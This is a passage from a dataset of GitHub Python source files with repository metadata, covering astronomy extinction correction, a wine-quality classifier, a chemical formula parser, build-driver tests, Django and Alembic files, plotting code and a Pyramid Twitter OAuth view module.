ImageDraw.Draw(canvas)\n background = background.resize((240,240))\n canvas.paste(background,(0,0))\n\ndef crash(obj1, obj2):\n x1 = obj1.x; y1 = obj1.y; w1 = obj1.width; h1 = obj1.height;\n x2 = obj2.x; y2 = obj2.y; w2 = obj2.width; h2 = obj2.height;\n\n if(x1 < x2 + w2 and x1 + w1 > x2 and y1 + h1 > y2 and y1 < y2 + h2):\n return True\n else:\n return False\n","repo_name":"suheoon/doge-game","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16293557420","text":"import numpy as np\nimport pandas as pd\n\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nfrom dustmaps.bayestar import BayestarWebQuery\ndef distance_parallax(x):\n return abs(1000/x)\ndf1 = pd.read_csv(r\"lowmass_sdss_2mass_wise_gaia.csv\",nrows=800000)\n#df_2=pd.read_csv(r\"lowmass_sdss_2mass_wise_gaia.csv\",skiprows=800000)\n\n\nprint(\"read file\")\nra_csv = df1['ra']\ndec_csv = df1['dec_']\nrmag_observe = df1['rmag']\nimag_observe = df1['imag']\nzmag_observe = df1['zmag']\nJmag_observe = df1['Jmag']\nHmag_observe = df1['Hmag']\nKmag_observe = df1['Kmag']\nW1mag_observe = df1['W1mag']\nW2mag_observe = df1['W2mag']\nW3mag = df1['W3mag']\nW4mag = df1['W4mag']\ne_rmag = df1['e_rmag']\ne_imag = df1['e_imag']\ne_zmag = df1['e_zmag']\ne_Jmag = df1['e_Jmag']\ne_Hmag = df1['e_Hmag']\ne_Kmag = df1['e_Kmag']\ne_W1mag = df1['e_W1mag']\ne_W2mag = df1['e_W2mag']\ne_W3mag = df1['e_W3mag']\ne_W4mag = df1['e_W4mag']\nid = df1['id']\nab_i = df1['ad_i']\nparallax = df1['parallax']\ndistance_ = df1['distance']\npm = df1['pm']\ndistance = df1['parallax'].map(distance_parallax)\nra_deg = ra_csv * u.deg\ndec_deg = dec_csv * u.deg\ndistance_pc = distance * u.pc\n# b0 = [10., 12., -25.]\n# l0=[90., 150., 35.]\n# data={\n# \"ra\":l0,\n# \"dec\":b0,\n# }\n# df=pd.DataFrame(data)\n# myvar_l=df['ra']\n# l = myvar_l* u.deg\n# myvar_b=df['dec']\n# b = myvar_b* u.deg\n# d = [500., 3500., 1000.] * u.pc\n# print(type(l0))\n# distance=d,\nprint(\"variable\")\ncoords = SkyCoord(ra_deg, dec_deg, distance=distance_pc, frame='icrs')\nq = BayestarWebQuery(version='bayestar2015')\nE = q(coords, mode='mean')\n# imag=imag_o E*1.971\n# print(E)\nprint(\"dustmap\")\nEpandas = pd.Series(E.tolist())\nEpandas.fillna(0, inplace=True)\nrmag = rmag_observe - Epandas * 2.31\nimag = imag_observe - Epandas * 1.71\nzmag = zmag_observe - Epandas * 1.29\nJmag = Jmag_observe - Epandas * 0.72\nHmag = Hmag_observe - Epandas * 0.46\nKmag = Kmag_observe - Epandas * 0.306\nW1mag = W1mag_observe - Epandas * 0.18\nW2mag = W2mag_observe - Epandas * 0.16\nprint(\"calculate\")\nextinc_mag = pd.concat(\n [rmag, imag, zmag, Jmag, Hmag, Kmag, W1mag, W2mag, W3mag, W4mag], axis=1)\n # imag_ndarray=np.array(imag)\n\n# ra_csv, dec_csv, , e_rmag, e_imag, e_zmag,\n# e_Jmag, e_Hmag, e_Kmag, e_W1mag, e_W2mag, e_W3mag, e_W4mag, rmag - imag, imag - zmag, zmag - Jmag, Jmag - Hmag,\n# Hmag - Kmag, Kmag - W1mag, W1mag - W2mag, W2mag - W3mag, W3mag - W4mag, rmag - zmag, imag - Jmag, zmag - Hmag,\n# Jmag - Kmag, Hmag - W1mag, Kmag - W2mag, W1mag - W3mag, W2mag - W4mag, rmag - Jmag, imag - Hmag, zmag - Kmag,\n# Jmag - W1mag, Hmag - W2mag, Kmag - W3mag, W1mag - W4mag, rmag - Hmag, imag - Kmag, zmag - W1mag, Jmag - W2mag,\n# Hmag - W3mag, Kmag - W4mag, rmag - Kmag, imag - W1mag, zmag - W2mag, Jmag - W3mag, Hmag - W4mag, rmag - W1mag,\n# imag - W2mag, zmag - W3mag, Jmag - W4mag, rmag - W2mag, imag - W3mag, zmag - W4mag, rmag - W3mag, imag - W4mag,\n# rmag - W4mag, id, ab_i, parallax, distance_, pm\n\n#df1head=df1.head(5)\n# extinc_mag_1=dustmapsql(df_1)\n# extinc_mag_2=dustmapsql(df_2)\n# extinc_mag=pd.concat([extinc_mag_1,extinc_mag_2],axis=1)\n# print(type(E))\n#print(E)\n#print(imag_ndarray)\n#np.savetxt('Extinction.csv',E,fmt=\"%f\",delimiter=',')\n#np.savetxt('imag_in.csv',imag_ndarray,fmt=\"%f\",delimiter=',')\nnp.savetxt('lowmass_sdss_2mass_wise_gaia_extinc.csv',extinc_mag,fmt=\"%f\",delimiter=',')","repo_name":"haifengchengguang/extinction","sub_path":"145w.py","file_name":"145w.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34329420938","text":"# Напишите программу, удаляющую из текста все слова, содержащие \"\"абв\"\"\n\ntext = 'Дорогие друзья, дальнейшее развитие различных форм деятельности обеспечивает \\\n широкому кругу абвспециалистов участиеабв в формировании новых предложений? Не следует, однако,\\\n забывать о том, что реализация намеченного плана развитияабв требует от нас анализа дальнейших \\\n направленийабв развития проекта.'\n\nfind_txt = \"абв\"\nlst = [i for i in text.split() if find_txt not in i]\nprint(' '.join(lst))","repo_name":"lplnt/python_home_work-","sub_path":"h_w_5/h_w_5.1.py","file_name":"h_w_5.1.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71898232161","text":"import pandas as pd\nimport numpy as np\n\nwine_df = pd.read_csv('C:/data/csv/winequality-white.csv', sep=';')\n\n'''\n########## EDA ##############\nprint(wine_df)\nprint(wine_df.columns)\n# [4898 rows x 12 columns]\n# Index(['fixed acidity', 'volatile acidity', 'citric acid', 'residual sugar',\n# 'chlorides', 'free sulfur dioxide', 'total sulfur dioxide', 'density',\n# 'pH', 'sulphates', 'alcohol', 'quality'],\n# dtype='object')\nprint(np.unique(wine_df.iloc[:,11]))\n# [3 4 5 6 7 8 9] # 퀄리티 종류\n\n# df_check = wine_df.isnull().values.any()\n# print(df_check)\n# False # 결측치 없음\n\n#############################\n'''\n\nwine_np = wine_df.to_numpy()\n# print(wine_np)\n# print(wine_np.shape)\n\nX = wine_np[:, :-1]\ny = wine_np[:, -1]\ny = y.astype(np.int64)\n# print(X.shape) # (4898, 11)\n# print(y.shape) # (4898,)\n# print(y)\n# print(np.unique(y))\n\n# 7 종류 classification\n# 전처리\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, RobustScaler, OneHotEncoder, LabelBinarizer\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.tree import ExtraTreeClassifier\n\nlb = LabelBinarizer()\ny = lb.fit_transform(y)\n# print(y[0])\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, train_size=0.8, random_state=66\n)\nscaler = MinMaxScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n#############################################\n\n'''\n####### modeling ###########\nclf = ExtraTreeClassifier()\nclf.fit(X_train, y_train)\n\naaa = clf.score(X_test, y_test)\nprint(\"model.score :\", aaa)\n############################\n'''\n\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, LSTM, Input\n\nmodel = Sequential()\nmodel.add(Dense(10, activation='relu', input_shape=(11,)))\nmodel.add(Dense(20))\nmodel.add(Dense(7, activation='softmax'))\n\n#3. compile and fit\nfrom tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau\nes = EarlyStopping(monitor='val_loss', patience=10, mode='auto')\nre = ReduceLROnPlateau(patience=5, verbose=1)\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\nmodel.fit(X_train, y_train, epochs=1000, batch_size=4, callbacks=[es, re], validation_split=0.2)\n\n#4. evaluate and predict\nloss = model.evaluate(X_test, y_test, batch_size=4)\nprint(\"loss :\", loss)\n\ny_pred = model.predict(X_test)\nprint(\"y_predict :\", y_pred)\n\n\n\n\n\n","repo_name":"biggymart/study","sub_path":"ML/m48_wine_quality_mine.py","file_name":"m48_wine_quality_mine.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40163514393","text":"import re\n\nfrom collections import defaultdict\n\n\ndef count_of_atoms(formula):\n criterion = r'([A-Z]{1}[a-z]?|\\(|\\)|\\d+)'\n stack = []\n tokens = list(filter(lambda c: c, re.split(criterion, formula)))\n count = defaultdict(int)\n i = 0\n\n while i < len(tokens):\n token = tokens[i]\n if token == '(':\n stack.append(count)\n stack.append(token)\n count = defaultdict(int)\n elif token == ')':\n tmp = stack.pop()\n while tmp != '(':\n for k, v in tmp.items():\n count[k] += v\n tmp = stack.pop()\n elif token.isdigit():\n if tokens[i - 1] == ')':\n for k, v in count.items():\n count[k] = v * int(token)\n else:\n count[tokens[i - 1]] += int(token) - 1\n else:\n count[token] += 1\n i += 1\n while stack:\n tmp = stack.pop()\n for k, v in tmp.items():\n count[k] += v\n\n sorted_count = sorted(count.items(), key=lambda x: x[0])\n result = ''\n\n for k, v in sorted_count:\n result += k\n if v != 1:\n result += str(v)\n\n return result\n\n\nprint(count_of_atoms('K4(ON(SO3)2)2'))","repo_name":"kavurisrikanth/competitive_programming","sub_path":"Week 4/Exam/NumAtoms.py","file_name":"NumAtoms.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16045606543","text":"import os\nimport unittest\nfrom yggdrasil import platform, tools\nfrom yggdrasil.tests import scripts, assert_raises, assert_equal\nimport yggdrasil.drivers.tests.test_ModelDriver as parent\nfrom yggdrasil.drivers.GCCModelDriver import (\n GCCModelDriver, get_zmq_flags, get_ipc_flags, get_flags,\n build_datatypes, build_api, build_regex_win32)\n\n\n_driver_installed = GCCModelDriver.is_installed()\n\n\ndef test_get_zmq_flags():\n r\"\"\"Test get_zmq_flags.\"\"\"\n cc, ld = get_zmq_flags()\n if not tools.is_comm_installed('ZMQComm', language='c'):\n assert_equal(len(cc), 0)\n assert_equal(len(ld), 0)\n\n\ndef test_get_ipc_flags():\n r\"\"\"Test get_ipc_flags.\"\"\"\n cc, ld = get_ipc_flags()\n if not tools.is_comm_installed('IPCComm', language='c'): # pragma: windows\n assert_equal(len(cc), 0)\n assert_equal(len(ld), 0)\n\n\ndef test_get_flags():\n r\"\"\"Test get_flags.\"\"\"\n cc, ld = get_flags()\n if not _driver_installed: # pragma: windows\n assert_equal(len(cc), 0)\n assert_equal(len(ld), 0)\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\ndef test_build_shared():\n r\"\"\"Test building libraries as shared.\"\"\"\n if platform._is_win: # pragma: windows\n build_regex_win32(overwrite=True)\n build_datatypes(as_shared=False, overwrite=True)\n build_datatypes(as_shared=True, overwrite=True)\n build_api(cpp=False, as_shared=True, overwrite=True)\n build_api(cpp=True, as_shared=True, overwrite=True)\n build_api(cpp=True, as_shared=True, overwrite=False)\n\n\n@unittest.skipIf(_driver_installed, \"C Library installed\")\ndef test_GCCModelDriver_no_C_library(): # pragma: windows\n r\"\"\"Test GCCModelDriver error when C library not installed.\"\"\"\n assert_raises(RuntimeError, GCCModelDriver, 'test', scripts['c'])\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\ndef test_GCCModelDriver_errors():\n r\"\"\"Test GCCModelDriver errors.\"\"\"\n assert_raises(RuntimeError, GCCModelDriver, 'test', 'test.py')\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\nclass TestGCCModelParam(parent.TestModelParam):\n r\"\"\"Test parameters for GCCModelDriver.\"\"\"\n\n driver = 'GCCModelDriver'\n \n def __init__(self, *args, **kwargs):\n super(TestGCCModelParam, self).__init__(*args, **kwargs)\n self.attr_list += []\n src = scripts['c']\n script_dir = os.path.dirname(src[0])\n if platform._is_win: # pragma: windows\n self.args = src + ['1', '-I' + script_dir, '/link', '-L' + script_dir]\n else:\n self.args = src + ['1', '-I' + script_dir, '-L' + script_dir]\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\nclass TestGCCModelDriverNoStart(TestGCCModelParam,\n parent.TestModelDriverNoStart):\n r\"\"\"Test runner for GCCModelDriver without start.\"\"\"\n\n def __init__(self, *args, **kwargs):\n # Version to run C++ example\n super(TestGCCModelDriverNoStart, self).__init__(*args, **kwargs)\n src = scripts['cpp']\n script_dir = os.path.dirname(src[0])\n if platform._is_win: # pragma: windows\n self.args = src + ['1', '-I' + script_dir, '/link', '-L' + script_dir,\n '/out:test_exe.exe']\n else:\n self.args = src + ['1', '-I' + script_dir, '-L' + script_dir,\n '-o', 'test_exe']\n \n # Done in driver, but driver not started\n def teardown(self):\n r\"\"\"Remove the instance, stoppping it.\"\"\"\n self.instance.cleanup()\n super(TestGCCModelDriverNoStart, self).teardown()\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\nclass TestGCCModelDriverNoStart_std(TestGCCModelDriverNoStart):\n r\"\"\"Test runner for GCCModelDriver with std lib specified.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(TestGCCModelDriverNoStart_std, self).__init__(*args, **kwargs)\n self.args.append('-std=c++11')\n\n\n@unittest.skipIf(not _driver_installed, \"C Library not installed\")\nclass TestGCCModelDriver(TestGCCModelParam, parent.TestModelDriver):\n r\"\"\"Test runner for GCCModelDriver.\"\"\"\n\n pass\n","repo_name":"ritviksahajpal/yggdrasil","sub_path":"yggdrasil/drivers/tests/test_GCCModelDriver.py","file_name":"test_GCCModelDriver.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"16776248262","text":"from django.utils.translation import gettext_lazy as _\nfrom django.conf.urls import url, include\n\nfrom olc_webportalv2.vir_typer import views\n\n# app_name = 'vir_typer'\nurlpatterns = [\n # Vir_typer Stuff\n url(r'^$', views.vir_typer_home, name='vir_typer_home'),\n url(_(r'^create/'), views.vir_typer_request, name='vir_typer_request'),\n url(_(r'^upload/(?P\\d+)/$'), views.vir_typer_upload, name='vir_typer_upload'),\n url(_(r'^results/(?P\\d+)/$'), views.vir_typer_results, name='vir_typer_results'),\n url(_(r'^edit/(?P\\d+)/$'), views.vir_typer_rename, name='vir_typer_rename'),\n # url(r'^processing/(?P\\d+)/$', views.vir_typer_processing, name='vir_typer_processing')\n # url(r'^geneseekr_query/', views.geneseekr_query, name='geneseekr_query'),\n # url(r'^geneseekr_processing/(?P\\d+)/$', views.geneseekr_processing, name='geneseekr_processing'),\n # url(r'^geneseekr_results/(?P\\d+)/$', views.geneseekr_results, name='geneseekr_results'),\n # url(r'^geneseekr_name/(?P\\d+)/$', views.geneseekr_name, name='geneseekr_name'),\n\n]\n","repo_name":"OLC-Bioinformatics/olc_genomics_portal","sub_path":"olc_webportalv2/vir_typer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"30343782369","text":"# This program prints a random from from a defined set \n# Author Alec Reid 18/04/2023\n\nimport random\nfruits = ['Apple', 'Tomatoe', 'Kiwi', 'Pineapple']\n\nindex = random.randint (0, len (fruits) -1)\n\nfruit = fruits[index] \nprint (\" A random fruit is :{}\" .format(fruit)) ","repo_name":"PectenMaximus/Pands-Problem-Sheet","sub_path":"randomfruit.py","file_name":"randomfruit.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15704041162","text":"\"\"\"topic add chart filed\n\nRevision ID: addc83e6c855\nRevises: 0db4d63e3ba7\nCreate Date: 2017-05-13 22:13:14.514075\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'addc83e6c855'\ndown_revision = '0db4d63e3ba7'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('topics', sa.Column('chart', sa.String(length=64), nullable=True))\n op.add_column('topics', sa.Column('chart_clfs', sa.Integer(), nullable=True))\n op.create_unique_constraint(None, 'topics', ['name'])\n op.create_unique_constraint(None, 'topics', ['chart'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'topics', type_='unique')\n op.drop_constraint(None, 'topics', type_='unique')\n op.drop_column('topics', 'chart_clfs')\n op.drop_column('topics', 'chart')\n # ### end Alembic commands ###\n","repo_name":"Zjianglin/proPredictor","sub_path":"migrations/versions/addc83e6c855_topic_add_chart_filed.py","file_name":"addc83e6c855_topic_add_chart_filed.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3466865321","text":"# Lab 2-2-1 question 7\r\n# By Julan Ray Avila Gutierrez, jra0108@arastudent.ac.nz\r\n\r\nNEWZEALAND_COUNRTYCODE = \"NZ\"\r\nAUSTRALIA_COUNTRYCODE = \"AU\"\r\nNEWZEALAND_CURRENCY = \"NZD\"\r\nAUSTRALIA_CURRENCY = \"AUD\"\r\n\r\nuser_name = input(\"Please enter your first name: \").strip().capitalize()\r\nexchange_rate = float(input(f\"Hi {user_name}. Please enter the\\\r\n {NEWZEALAND_COUNRTYCODE}/{AUSTRALIA_COUNTRYCODE} exchange rate: \"))\r\nnzd_money = float(input(f\"Please enter the amount of {NEWZEALAND_COUNRTYCODE} $'s you want to exchange: \"))\r\n\r\naus_money = (exchange_rate) * nzd_money\r\n \r\n#output \r\nprint(f\"{user_name}, I can exchange {nzd_money:.2f} {NEWZEALAND_CURRENCY}\\\r\n into {aus_money:.2f} {AUSTRALIA_CURRENCY} for you.\")\r\n","repo_name":"J-RAG/DTEC501-Python-Files","sub_path":"Lab 2-2-1qs7.py","file_name":"Lab 2-2-1qs7.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22488081218","text":"import os\r\nfrom random import randrange\r\nimport matplotlib.lines as mlines\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom keras.utils.vis_utils import plot_model\r\nimport syndalib.drawer as sydraw\r\nimport syndalib.linalg as syla\r\nfrom utils.enums import ClassValues\r\nfrom utils.vandermonde import get_vandermonde_matrix\r\n\r\n\r\ndef get_rc(model_index):\r\n \"\"\"\r\n 0 --> 0,1\r\n 1 --> 1,0\r\n 2 --> 1,1\r\n 3 --> 2,1\r\n\r\n :param model_index: index of the model in the pic ( from 0 t0 num_models -1)\r\n :return: row and column index of axs that refer to the plotting of that particular model\r\n \"\"\"\r\n num = model_index + 1\r\n row = int(np.floor(num / 2.0))\r\n col = num - 2 * row\r\n return row, col\r\n\r\n\r\ndef plot_multi_model_sample(i_sample,\r\n sample_xy,\r\n sample_preds: np.ndarray,\r\n path: str,\r\n plot: bool,\r\n plot_predicted_models: bool,\r\n vander,\r\n heatmaps=True):\r\n \"\"\"\r\n :param sample_xy: (num points per sample, num coordinates=2)\r\n :param sample_preds: (num points per sample, num models)\r\n :param path: name of img folder\r\n :param plot: bool, if true plots otherwise not\r\n :param plot_predicted_models: bool, if true plots the predicted models along with the heatmaps\r\n :param vander: IT SHOULD BE (npps, num monomials), but it's (ns, npps, num monomials) np.array vandermonde matrix of the sample\r\n :param heatmaps:\r\n\r\n :return:\r\n \"\"\"\r\n\r\n plt.clf()\r\n color_outliers = \"tab:grey\"\r\n colors = [\r\n \"tab:orange\",\r\n \"tab:green\",\r\n \"tab:blue\",\r\n \"tab:pink\",\r\n \"tab:red\",\r\n \"tab:black\",\r\n ]\r\n assert len(sample_xy) == len(sample_preds)\r\n num_points_per_sample = sample_preds.shape[0]\r\n num_models = sample_preds.shape[1]\r\n\r\n if not heatmaps:\r\n for i in range(num_models):\r\n inliers = [\r\n sample_xy[j]\r\n for j in range(num_points_per_sample)\r\n if sample_preds[j, i] < 0.5\r\n ]\r\n if len(inliers) > 0:\r\n plt.scatter(*zip(*inliers), s=10)\r\n # compute outliers as points that are classified as outliers for all models\r\n outliers = [\r\n sample_xy[j]\r\n for j in range(num_points_per_sample)\r\n if all(sample_preds[j, :] > 0.5)\r\n ]\r\n plt.scatter(*zip(*outliers), s=10)\r\n\r\n if heatmaps:\r\n ### first ax for all models together, the remaining for single ones.\r\n fig, axs = plt.subplots(\r\n int(np.ceil((num_models + 1) / 2.0)), 2, figsize=(10, 10), squeeze=False\r\n )\r\n fig.suptitle(\"Sample's Plot\", fontsize=\"xx-large\")\r\n for ax in fig.get_axes():\r\n ax.label_outer()\r\n\r\n # plot entire sample (every model + outliers)\r\n axs[0][0].set_aspect(\"equal\", \"datalim\")\r\n axs[0][0].set_title(\"all models and outliers\")\r\n model_markers = []\r\n for i in range(num_models):\r\n model_marker = mlines.Line2D(\r\n [],\r\n [],\r\n color=colors[i],\r\n marker=\".\",\r\n linestyle=\"None\",\r\n markersize=10,\r\n label=\"model\" + str(i + 1),\r\n )\r\n model_markers.append(model_marker)\r\n inliers = [sample_xy[j] for j in range(num_points_per_sample) if sample_preds[j, i] < 0.5]\r\n # inliers = [sample_xy[j] for j in range(num_points_per_sample) if tf.less(sample_preds[j, i], 0.5)]\r\n if len(inliers) > 0:\r\n axs[0][0].scatter(*zip(*inliers), c=colors[i], s=10)\r\n # compute outliers as points that are classified as outliers for all models\r\n outliers = [\r\n sample_xy[j]\r\n for j in range(num_points_per_sample)\r\n if all(sample_preds[j, :] >= 0.5)\r\n ]\r\n if len(outliers) > 0:\r\n axs[0][0].scatter(*zip(*outliers), c=color_outliers, s=10)\r\n\r\n outliers_marker = mlines.Line2D([], [], color=color_outliers, marker=\".\", linestyle=\"None\", markersize=10, label=\"outliers\")\r\n\r\n model_markers.append(outliers_marker)\r\n axs[0][0].legend(handles=model_markers, loc=\"upper right\")\r\n\r\n # plot each model separately\r\n for i in range(num_models):\r\n r, c = get_rc(i)\r\n inliers_prob = 1.0 - sample_preds[:, i]\r\n axs[r][c].set_title(\"model \" + str(r * 2 + c))\r\n axs[r][c].set_aspect(\"equal\", \"datalim\")\r\n sc = axs[r][c].scatter(*zip(*sample_xy), c=inliers_prob, s=10, vmin=0, vmax=1)\r\n\r\n if plot_predicted_models:\r\n predicted_coefs = syla.dlt_coefs(vander, inliers_prob, returned_type=\"numpy\")\r\n\r\n # hard coding case circle case!\r\n a = predicted_coefs[0]\r\n b = 0\r\n cc = predicted_coefs[0]\r\n d = predicted_coefs[1]\r\n e = predicted_coefs[2]\r\n f = predicted_coefs[3]\r\n coefs = [a, b, cc, d, e, f]\r\n cx, cy = sydraw.conic_points(coefs=coefs,\r\n x_range=(-2, 2),\r\n y_range=(-2, 2),\r\n resolution=2000) # maybe it's useless to specify ranges\r\n axs[r][c].scatter(cx, cy, s=1, c=\"tab:purple\")\r\n\r\n cbar = plt.colorbar(sc, ax=axs[r][c])\r\n cbar.set_label(\"inlier probability\")\r\n\r\n # save image\r\n os.makedirs(path, exist_ok=True)\r\n title = path + \"/\" + str(i_sample) + \".png\"\r\n plt.savefig(title)\r\n\r\n if plot is True:\r\n plt.show()\r\n\r\n\r\ndef plot_multi_model_predictions(predictions, xy, path, plot: bool, plot_predicted_models: bool):\r\n \"\"\"\r\n\r\n :param predictions: (bs, num points per sample, num models) predictions\r\n :param xy: (bs, num points per sample, 1, num coords) points coordinates\r\n :param path: path of the folder in which to save imgs\r\n :param plot: bool, if true plots and saves img otherwise just saves img\r\n :param plot_predicted_models: bool, if true plots along with the inliers probability the predicted model\r\n :return:\r\n \"\"\"\r\n if plot_predicted_models:\r\n nm = predictions.shape[-1]\r\n n_coords = xy.shape[-1]\r\n vanders = get_vandermonde_matrix(segmentation_inputs=xy,\r\n nm=nm,\r\n is_loss_v1=True,\r\n class_type=ClassValues.CIRCLES,\r\n n_coords=n_coords)\r\n\r\n i_sample = 0\r\n while i_sample < predictions.shape[0]:\r\n if plot_predicted_models:\r\n sample_vander = vanders[i_sample]\r\n else:\r\n sample_vander = None\r\n\r\n # retrieve coordinates of circle\r\n if len(xy.shape) == 4:\r\n sample_xy = xy[i_sample, :, 0, 0:2]\r\n else:\r\n sample_xy = xy[i_sample, :, 0:2]\r\n\r\n sample_preds = predictions[i_sample]\r\n plot_multi_model_sample(i_sample, sample_xy, sample_preds, path, plot, plot_predicted_models=plot_predicted_models, vander=sample_vander)\r\n i_sample += 100\r\n","repo_name":"WilliamBonvini/ulmmcm","sub_path":"utils/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":7368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"40838360131","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Provides authenticate, authorize and callback views and a failed view to\n redirect to when OAuth fails, e.g.: when Twitter is down.\n\"\"\"\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nimport tweepy\n\nfrom formencode import Invalid\n\nfrom pyramid.httpexceptions import HTTPForbidden, HTTPFound, HTTPUnauthorized\nfrom pyramid.security import forget, remember, unauthenticated_userid\nfrom pyramid.security import NO_PERMISSION_REQUIRED as PUBLIC\nfrom zope.interface.registry import ComponentLookupError\n\nfrom pyramid_basemodel import save as save_to_db\nfrom pyramid_simpleauth.events import UserSignedUp, UserLoggedIn\nfrom pyramid_simpleauth.schema import RequestPath\nfrom pyramid_simpleauth.model import User\n\nfrom .hooks import get_handler\nfrom .model import get_existing_twitter_account, TwitterAccount, TwitterProfile\n\ndef forbidden_view(request):\n \"\"\"Handle a user being denied access to a resource or view by redirecting\n to authenticate via Twitter. See the ``pyramid_twitterauth.includeme``\n function for info on how to expose this view.\n \n Setup::\n \n >>> from mock import Mock\n >>> from pyramid_twitterauth import view\n >>> _unauthenticated_userid = view.unauthenticated_userid\n >>> view.unauthenticated_userid = Mock()\n >>> mock_request = Mock()\n >>> mock_request.path = '/forbidden/page'\n >>> mock_request.route_url.return_value = '/oauth/twitter/authenticate'\n \n If the user is already logged in, it means they don't have the requisit\n permission, so we raise a 403 Forbidden error::\n \n >>> view.unauthenticated_userid.return_value = 1234\n >>> response = forbidden_view(mock_request)\n >>> response.status\n '403 Forbidden'\n \n Otherwise we redirect to the authenticate view::\n \n >>> view.unauthenticated_userid.return_value = None\n >>> response = forbidden_view(mock_request)\n >>> kwargs = {\n ... '_query': (('next', '/forbidden/page'),),\n ... 'traverse': ('authenticate',)\n ... }\n >>> mock_request.route_url.assert_called_with('twitterauth', **kwargs)\n >>> response.location\n '/oauth/twitter/authenticate'\n >>> response.status\n '302 Found'\n \n Teardown::\n \n >>> view.unauthenticated_userid = _unauthenticated_userid\n \n \"\"\"\n \n if unauthenticated_userid(request):\n return HTTPForbidden()\n query = (('next', request.path),)\n url = request.route_url('twitterauth', traverse=('authenticate',), _query=query)\n return HTTPFound(location=url)\n\n\ndef _redirect_to_failed(request, redirect_cls=HTTPFound):\n \"\"\"Redirect to the failed view.\n \n Setup::\n \n >>> from mock import Mock\n >>> mock_request = Mock()\n >>> mock_request.route_url.return_value = 'redirect url'\n >>> mock_redirect_cls = Mock()\n >>> mock_redirect_cls.return_value = 'http found'\n \n Test::\n \n >>> _redirect_to_failed(mock_request, redirect_cls=mock_redirect_cls)\n 'http found'\n >>> kwargs = dict(traverse=('failed',))\n >>> mock_request.route_url.assert_called_with('twitterauth', **kwargs)\n >>> mock_redirect_cls.assert_called_with(location='redirect url')\n \n \"\"\"\n \n url = request.route_url('twitterauth', traverse=('failed',))\n return redirect_cls(location=url)\n\ndef _do_oauth_redirect(request, is_authenticate, handler_factory=get_handler):\n \"\"\"Start the OAuth dance by getting a request token from the Twitter API,\n storing it in the session and then redirecting to Twitter.\n \n Setup::\n \n >>> from mock import Mock\n >>> mock_request = Mock()\n >>> mock_request.session = {}\n >>> mock_handler = Mock()\n >>> mock_handler.get_authorization_url.return_value = 'url'\n >>> mock_handler.request_token.key = 'key'\n >>> mock_handler.request_token.secret = 'secret'\n >>> mock_handler_factory = Mock()\n >>> mock_handler_factory.return_value = mock_handler\n \n Stores whether this OAuth attempt is a signin or not::\n \n >>> return_value = _do_oauth_redirect(mock_request, True,\n ... handler_factory=mock_handler_factory)\n >>> mock_request.session['twitter_oauth_is_authenticate']\n True\n \n If there's a ``next`` param in the request, stores that too::\n \n >>> mock_request.params = {'next': '/foo/bar'}\n >>> return_value = _do_oauth_redirect(mock_request, True,\n ... handler_factory=mock_handler_factory)\n >>> mock_request.session.get('twitter_oauth_next')\n u'/foo/bar'\n \n As long as it's a valid path::\n \n >>> mock_request.session = {}\n >>> mock_request.params = {'next': '\n# \n# \n# \n# \n# LOG\n#

